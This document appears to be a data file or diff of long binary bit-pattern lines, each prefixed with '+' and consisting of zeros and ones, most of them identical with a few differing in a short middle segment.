+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001111111001010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111010110100100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 